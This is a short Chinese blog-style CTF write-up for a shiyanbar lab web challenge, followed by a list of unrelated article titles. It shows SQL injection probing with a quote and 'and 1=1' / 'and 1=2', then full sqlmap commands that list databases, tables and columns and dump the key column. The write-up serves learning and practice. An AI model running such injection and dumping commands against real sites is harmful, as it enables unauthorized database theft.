CTF之web这道题很简单
来源:互联网 发布:淘宝90后男模特排名 编辑:程序博客网 时间:2024/06/06 03:28
网站名称:http://ctf5.shiyanbar.com/8/index.php?id=1
1、输入【’】报错,发现注入
2、输入【and 1=1】正常,输入【and 1=2】不正常,证明就是SQL注入
3、sqlmap进行SQL注入,这个可以通过linux虚拟机进行操作,也可以直接在windows操作系统中安装sqlmap进行操作,这个在我的博客里有相关介绍,博客地址:http://blog.csdn.net/lijia1111,安装好sqlmap后输入一下指令:
查看当前数据库:sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -v 1 --current-db查看表:sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -v 1 -D my_db --tables查看列:sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -v 1 -D my_db -T thiskey --columns查看key:sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -v 1 -D my_db -T thiskey -C koy --dump
得到key值
如图是我的操作过程:
1、查看当前数据库
2、查看表
3、查看列
4、查看key的值
得到key的值,之前得到的不是正确的,因为当时把k0y看错了。
sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -v 1 --dump -C koy -T thiskey -D my_db
当我对sqlmap了解更深入以后,才能输入正确的指令,现在先不对sqlmap指令有深究。。。
0 0
- CTF之web这道题很简单
- CTF Web简单的SQL注入
- ctf之简单编程,字符统计
- 实验吧ctf-web题:这个看起来有点简单
- 实验吧ctf-web题:简单的sql注入
- CTF-问鼎杯-WEB之请帮忙找出秘密
- CTF-WEB小技俩
- CTF web总结
- CTF-web练习
- D0g3 CTF-WEB
- 实验吧CTF-web
- SniperOJ-CTF练习-web
- 南邮ctf-web-wp
- Web-ctf-StudyNote
- My CTF Web Challenges
- CTF web总结
- ctf-web常用网页
- CTF菜鸟学习笔记之初始CTF
- java中map,set,list,array相互转化
- Java Configuration and Form Login
- TensorFlow 学习网站,不定期更新
- springIoc案例之action/service/dao
- java开发C解释器:实现动态内存的分配和读写
- CTF之web这道题很简单
- Tomcat双向SSL认证及CA数字证书安装和配置&QQ即时通信协议窥探
- PAT B1046. 划拳(15)
- 注解@PostConstruct与@PreDestroy
- Python标准库(10)------------多进程初步 (multiprocessing包)
- 解决python3 安装twisted错误,报Unable to find vcvarsall.bat
- Android M(6.0) 权限爬坑之旅
- Hibernate 一对多单向关联
- C#从sqlserver中获取数据的方法